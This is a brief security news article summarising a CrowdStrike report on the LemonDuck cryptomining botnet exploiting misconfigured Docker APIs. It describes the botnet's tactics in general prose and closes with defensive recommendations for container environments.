A recent report from CrowdStrike has revealed that the notorious LemonDuck cryptocurrency mining botnet is now setting its sights on misconfigured Docker APIs. LemonDuck, known for exploiting vulnerabilities in Microsoft Exchange Server and utilizing various exploits for crypto-mining, privilege escalation, and lateral movement within compromised networks, has expanded its tactics to target Docker APIs.
According to CrowdStrike, LemonDuck is leveraging exposed Docker APIs to gain initial access. The botnet deploys a malicious container on the exposed Docker API using a custom Docker Entrypoint to download a disguised Bash script named ‘core.png’ as a precursor to downloading the payload, an “a.asp” file, to kickstart the mining process. Prior to initiating mining activities, LemonDuck carries out several actions, such as terminating processes, clearing IOC file paths, and severing connections with competing crypto-mining groups. Additionally, the a.asp file is equipped with the ability to disable Alibaba’s cloud monitoring service, allowing LemonDuck to evade detection by network defenders.
In its lateral movement efforts, LemonDuck searches for SSH keys on filesystems to gain access to additional servers and execute its malicious scripts. CrowdStrike’s researchers have identified multiple campaigns originating from LemonDuck’s C&C servers, targeting both Windows and Linux systems.
The surge in cryptocurrency values in recent years, coupled with the widespread adoption of cloud and container technologies in enterprises, has made crypto-mining a lucrative option for threat actors. As a result, botnets like LemonDuck have shifted their focus to target Docker for crypto-mining on the Linux platform.
This development underscores the importance for administrators to ensure that their container environments are properly configured in line with industry best practices. It is recommended to implement cloud workload security solutions and detection and response tools to enhance the security posture of containerized environments and mitigate the risk of crypto-mining attacks.